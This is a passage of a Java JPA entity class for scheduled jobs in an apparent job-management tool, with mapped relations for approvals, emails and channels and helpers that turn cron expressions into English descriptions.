@OneToMany(cascade = CascadeType.ALL, orphanRemoval = true)
@JoinColumn(name = "job_id", referencedColumnName = "id")
@BatchSize(size = 20)
public List<JobApproval> getApproval() {
return approval;
}
public void setApproval(List<JobApproval> approval) {
this.approval = approval;
}
public void addApproval(JobApproval approval) {
this.approval.add(approval);
}
@ManyToMany(cascade = {CascadeType.DETACH, CascadeType.MERGE, CascadeType.REFRESH, CascadeType.PERSIST})
@JoinTable(name = "job_workbench_email",
joinColumns = {
@JoinColumn(name = "job_id", referencedColumnName = "id")},
inverseJoinColumns = {
@JoinColumn(name = "workbench_email_id", referencedColumnName = "id")})
public List<WorkbenchEmail> getEmail() {
return email;
}
public void setEmail(List<WorkbenchEmail> email) {
this.email = email;
}
public void addEmail(WorkbenchEmail email) {
this.email.add(email);
}
@Transient
public List<String> getShellScript() {
return shellScript;
}
public void setShellScript(List<String> shellScript) {
this.shellScript = shellScript;
}
public void addShellScript(String shellScript) {
this.shellScript.add(shellScript);
}
@Transient
public String getNode() {
return node;
}
public void setNode(String node) {
this.node = node;
}
public boolean isRebuild() {
return rebuild;
}
public void setRebuild(boolean rebuild) {
this.rebuild = rebuild;
}
public boolean isNotify() {
return notify;
}
public void setNotify(boolean notify) {
this.notify = notify;
}
public int getRetry() {
return retry;
}
public void setRetry(int retry) {
this.retry = retry;
}
public int getTolerance() {
return tolerance;
}
public void setTolerance(int tolerance) {
this.tolerance = tolerance;
}
public int getWait() {
return wait;
}
public void setWait(int wait) {
this.wait = wait;
}
@ManyToOne
@JoinColumn(name = "user_id", referencedColumnName = "user_id")
public User getApprover() {
return this.approver;
}
public void setApprover(User approver) {
this.approver = approver;
}
@ElementCollection(fetch = FetchType.EAGER)
@CollectionTable(name = "job_channel", joinColumns = @JoinColumn(name = "id"))
@Column(name = "channel")
public Set<String> getChannel() {
return channel;
}
public void setChannel(Set<String> channel) {
this.channel = channel;
}
public void addChannel(String channel) {
this.channel.add(channel);
}
public boolean isEnabled() {
return enabled;
}
public void setEnabled(boolean enabled) {
this.enabled = enabled;
}
public boolean isRebuildBlocked() {
return rebuildBlocked;
}
public void setRebuildBlocked(boolean rebuildBlocked) {
this.rebuildBlocked = rebuildBlocked;
}
public String getTimeRestriction() {
return timeRestriction;
}
public void setTimeRestriction(String timeRestriction) {
this.timeRestriction = timeRestriction;
}
@Transient
public String getTimeRestrictionDescription() {
String verbose = "";
if (this.getTimeRestriction() != null) {
if (!this.getTimeRestriction().isEmpty()) {
verbose = StringUtils.capitalize(
CronDescriptor
.instance(Locale.ENGLISH)
.describe(new CronParser(
CronDefinitionBuilder.instanceDefinitionFor(QUARTZ))
.parse(this.getTimeRestriction())
)
);
}
}
return verbose;
}
public boolean isAnyScope() {
return anyScope;
}
public void setAnyScope(boolean anyScope) {
this.anyScope = anyScope;
}
public boolean isCheckupNotified() {
return checkupNotified;
}
public void setCheckupNotified(boolean checkupNotified) {
this.checkupNotified = checkupNotified;
}
@Transient
public String getCron() {
return cron;
}
public void setCron(String cron) {
this.cron = cron;
}
@Transient
public String getCronDescription() {
return this.getCronDescription(false);
}
@Transient
public String getCronDescription(boolean secure) {
String cronDescription = "";
if (this.getCron() != null && !this.getCron().isEmpty()) {
CronParser parser = new CronParser(CronDefinitionBuilder.instanceDefinitionFor(UNIX));
CronDescriptor descriptor = CronDescriptor.instance(Locale.ENGLISH);
if (secure) {
try {
cronDescription = descriptor.describe(parser.parse(this.getCron()));
} catch (IllegalArgumentException e) {
cronDescription = e.getMessage();
}
} else {
cronDescription = descriptor.describe(parser.parse(this.getCron()));
}
}
return StringUtils.capitalize(cronDescription);
}
@Transient
public String getBlockingJobs() {
return blockingJobs;
}
public void setBlockingJobs(String blockingJobs) {
this.blockingJobs = blockingJobs;
}
@Override
public int hashCode() {
int hash = 3;
hash = 53 * hash + Objects.hashCode(this.id);
return hash;
}
@Override
public boolean equals(Object obj) {
final Job other = (Job) obj;
if (this == obj) {
return true;
}
if (obj == null) {
return false;
}
if (getClass() != obj.getClass()) {
return false;
}
return Objects.equals(this.id, other.id);
}
@Override
public String toString() {
JSONObject object = new JSONObject();
object.put("id", id);
object.put("name", name);
object.put("alias", alias);
object.put("description", description);
object.put("enabled", enabled);
return object.toString(2);
}
} |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.